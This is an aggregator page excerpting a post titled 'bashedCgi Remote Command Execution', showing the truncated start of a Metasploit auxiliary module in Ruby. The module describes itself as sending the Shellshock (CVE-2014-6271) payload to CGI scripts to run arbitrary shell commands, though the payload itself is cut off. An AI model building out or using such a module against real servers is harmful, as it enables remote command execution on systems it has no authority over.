Quantcast
Channel: Il Bloggatore » Environment variable
Viewing all articles
Browse latest Browse all 14

bashedCgi Remote Command Execution

$
0
0
require 'msf/core'   class Metasploit3 < Msf::Auxiliary   include Msf::Exploit::Remote::HttpClient     def initialize(info = {}) super(update_info(info, 'Name' => 'bashedCgi', 'Description' => %q{ Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. },...

Viewing all articles
Browse latest Browse all 14

Trending Articles